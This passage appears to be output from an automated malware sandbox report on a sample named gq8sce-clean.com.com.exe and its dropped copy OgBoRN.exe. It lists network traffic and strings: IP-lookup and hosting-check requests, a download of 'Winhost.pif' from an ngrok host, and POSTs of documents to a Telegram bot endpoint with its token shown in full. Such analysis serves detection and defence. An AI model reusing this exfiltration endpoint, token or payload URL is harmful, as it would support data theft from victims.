              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET //Winhost.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: kvrcmhqc.ngrok.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: kvrcmhqc.ngrok.io
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd50fd7cec3be6Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainNgrok-Error-Code: ERR_NGROK_3200Date: Wed, 19 Feb 2025 17:03:32 GMTContent-Length: 62
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainNgrok-Error-Code: ERR_NGROK_3200Date: Wed, 19 Feb 2025 17:03:49 GMTContent-Length: 62
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainNgrok-Error-Code: ERR_NGROK_3200Date: Wed, 19 Feb 2025 17:03:57 GMTContent-Length: 62
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007241000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.000000000735F000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000072FF000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007412000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000070A2000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007EB4000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007D1F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007E75000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D2F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007F13000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: http://confuser.codeplex.com
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearerlhttp://docs.oasis-open.org/ws-sx/ws-trust/20
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512Vhttp://schemas.xmlsoap.org/ws/2005/02/trustthttp://
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdNhttp://schemas.xm
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/YroZm
              Source: OgBoRN.exe, 00000003.00000002.2401382417.0000000007B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B46000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting(snxhk.dll%SbieDll.dll
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: http://portal.microsoftazure.de/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://portal.microsoftazure.de/Bhttps://login.microsoftonline.de/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Azure.Common.Authentication
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.WindowsAzure.Commands.Utilities.Common
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.WindowsAzure.ServiceManagement
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/Xhttp://schemas.xmlsoap.org/ws/2004/09/policyfhttp://schemas.microso
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: http://www.galasoft.ch/s/dialogmessage.
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: http://www.galasoft.ch/s/dialogmessage.-
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://api.loganalytics.io/v14azuredatalakeanalytics.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.loganalytics.io/v16https://api.loganalytics.io
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007241000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.000000000735F000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000072FF000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000070A2000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007EB4000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007D1F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007E75000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D2F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007F13000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007241000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.000000000735F000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000072FF000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007412000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000070A2000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007EB4000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007D1F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007E75000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D2F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007F13000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgH
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgq/H
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://batch.chinacloudapi.cn/
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://batch.chinacloudapi.cn/Jhttps://batch.core.usgovcloudapi.net/4https://batch.cloudapi.de/
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://batch.core.windows.net/
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://datalake.azure.net
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://dc.services.visualstudio.com/v2/track
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/trackVDequeueAndSend:
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://graph.chinacloudapi.cn/4https://graph.cloudapi.de/$trafficmanager.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://graph.cloudapi.de/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B58000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kvrcmhqc.ngrok.io
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B58000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kvrcmhqc.ngrok.io//Winhost.pif
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kvrcmhqc.ngrok.io//Winhost.pif5
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://login.chinacloudapi.cn/Bhttps://login.microsoftonline.us/Bhttps://login.microsoftonline.de/4
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://manage.microsoftazure.de/publishsettings/indexHhttps://management.core.cloudapi.de/Jhttps://
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://manage.windowsazure.us
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://manage.windowsazure.us/publishsettings/indexThttps://management.core.usgovcloudapi.net/Jhttp
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://manage.windowsazure.usBhttps://login.microsoftonline.us/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://management.core.windows.net(cloudServiceSettings
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://management.core.windows.net/Rhttps://management.core.chinacloudapi.cn/Thttps://management.co
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.azure.cn
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.azure.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vault.azure.net4azuredatalakeanalytics.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vault.microsoftazure.de4https://batch.cloudapi.de/$Settings
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.microsoftazure.de6https://api.loganalytics.io
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://vault.usgovcloudapi.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vault.usgovcloudapi.netJhttps://batch.core.usgovcloudapi.net/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
